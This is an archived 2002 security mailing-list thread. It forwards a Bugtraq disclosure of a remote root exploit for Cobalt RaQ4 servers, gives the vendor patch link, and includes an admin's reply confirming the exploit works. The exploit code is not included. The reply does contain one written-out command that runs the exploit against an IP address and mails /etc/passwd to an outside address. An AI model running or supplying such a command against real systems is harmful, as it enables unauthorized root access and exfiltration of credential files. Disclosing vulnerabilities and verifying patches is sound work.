-----Original Message-----
From: Goade, Matthew
Sent: Thursday, December 05, 2002 4:58 PM
To: cobalt-security@xxxxxxxxxxxxxxx
Subject: RE: [cobalt-security] FW: Cobalt RaQ4 Remote root exploitIt works on mine./a.out 65.65.233.131 "cat /etc/passwd |mail mgoade@xxxxxxxxxxxxxxx"mails me the passwd file-----Original Message-----
From: Goade, Matthew
Sent: Thursday, December 05, 2002 4:48 PM
To: cobalt-security@xxxxxxxxxxxxxxx
Subject: [cobalt-security] FW: Cobalt RaQ4 Remote root exploitCan anyone verify that this works?
-----Original Message-----
From: grazer@xxxxxxxxxxxxxx [mailto:grazer@xxxxxxxxxxxxxx]
Sent: Thursday, December 05, 2002 3:39 PM
To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Cobalt RaQ4 Remote root exploit
Hello,
I've attached an exploit that will allow an attacker to gain remote
root access on Cobalt RaQ's which have the security hardening package
installed (SHP).the official patch for this problem can be found here :
http://ftp.cobalt.sun.com/pub/packages/raq4/eng/RaQ4-en-Security-2.0.1-SHP_REM.pkg
Wouter ter Maat aka grazer@xxxxxxxxxxxxxx
http://www.i-security.nl